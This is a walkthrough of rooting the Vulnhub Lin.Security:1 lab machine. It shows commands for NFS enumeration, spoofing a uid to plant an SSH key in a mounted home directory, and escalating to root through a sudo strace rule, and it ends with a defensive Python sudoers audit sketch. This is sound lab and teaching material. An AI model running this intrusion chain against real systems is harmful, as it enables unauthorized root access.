Today we will root the Lin.Security:1 machine from Vulnhub. This is a simple and straightforward boot2root machine.
Let's start by finding the IP.
root@kali:~# nmap -sS 192.168.18.0/24
Got the IP and open ports.
NFS is running on port 2019. Let's enumerate it.
root@kali:~# nmap -sV --script=nfs-* 192.168.18.102
We can mount /home/peter to our machine.
root@kali:/mnt# mkdir lin
root@kali:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
root@kali:/mnt# ls -la
In order to log in to the machine, we can place our SSH public key in the .ssh directory (refer to this article to learn how to create an SSH key).
Copy our public key (id_rsa.pub) to the /tmp directory.
root@kali:/mnt# cd /root/.ssh
root@kali:~/.ssh# ls -la
total 20
drw------- 2 root root 4096 Jul 2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw------- 1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r-- 1 root root 563 Aug 12 08:35 id_rsa.pub
-rw-r--r-- 1 root root 3322 Aug 13 06:47 known_hosts
root@kali:~/.ssh# cp id_rsa.pub /tmp
Make a directory named .ssh in the directory we just mounted.
root@kali:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied
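We don't have permission to create the directory.
The export trusts the numeric uid that the NFS client presents, so a local user with the matching uid can write to it. Let's create a user with uid 1001 to do this.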
root@kali:~# useradd -u 1001 peter
Now change the ownership of /tmp/id_rsa.pub to peter.
root@kali:~/.ssh# cd /tmp
root@kali:/tmp# chown peter:peter id_rsa.pub
root@kali:/tmp#
Let's copy the file to the mounted directory now. First we switch to the user peter, then copy the file.
root@kali:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys
We have copied our public key file to /mnt/lin/.ssh/authorized_keys on the mounted share.
Now, let's try to log in as peter through SSH.
root@kali:~# cd .ssh
root@kali:~/.ssh# ssh peter@192.168.18.102
We are now logged in as peter. Let's see what we can do here as a privileged user.
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
We can run /usr/bin/strace as root.
Can we escalate our privileges with this? Let's try.
peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami
root
We got root!
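From the defender's side, the sudoers rule above is the finding to catch in review. The following audit sketch is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that amount to root. The function names, the `RUNS_OTHER_PROGRAMS` set and the second sample rule are assumptions made for illustration, and commas escaped inside command arguments are not handled.

```python
import re
from pathlib import PurePosixPath

# Programs that launch a command chosen by the caller. Only strace comes from
# this write-up; extending the set is left to your own review (assumption).
RUNS_OTHER_PROGRAMS = {"strace"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"(?P<tag>[A-Z_]+):\s*")

# First rule is the one shown above; the second is constructed for contrast.
SAMPLE = """\
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass
User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace
    (root) /usr/bin/systemctl status ssh
"""


def parse_sudo_l(text):
    """Return one dict per command on the '(runas) [TAG:] cmd, cmd' lines."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)  # rule lines are the ones starting with "(runas)"
        if not m:
            continue
        rest, tags = m["rest"], set()
        while (t := TAG.match(rest)):  # peel off NOPASSWD:, SETENV:, ...
            tags.add(t["tag"])
            rest = rest[t.end():]
        for cmd in filter(None, (c.strip() for c in rest.split(","))):
            rules.append({"runas": m["runas"], "tags": tags, "command": cmd})
    return rules


def audit(rules):
    """Flag rules that amount to unrestricted root."""
    findings = []
    for r in rules:
        runas = {u.strip() for u in re.split(r"[:,]", r["runas"])}
        if not runas & {"ALL", "root"}:
            continue
        binary = PurePosixPath(r["command"].split()[0]).name
        if r["command"] == "ALL":
            findings.append((r["command"], "any command as root"))
        elif binary in RUNS_OTHER_PROGRAMS:
            pw = "without" if "NOPASSWD" in r["tags"] else "with"
            findings.append((r["command"], f"starts arbitrary programs as root, {pw} a password"))
    return findings
```

Running `audit(parse_sudo_l(SAMPLE))` reports only the strace rule; the fix is to remove that sudoers entry or replace it with a wrapper that runs one fixed command.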
This was a comparatively easy machine. Let's root another machine next time!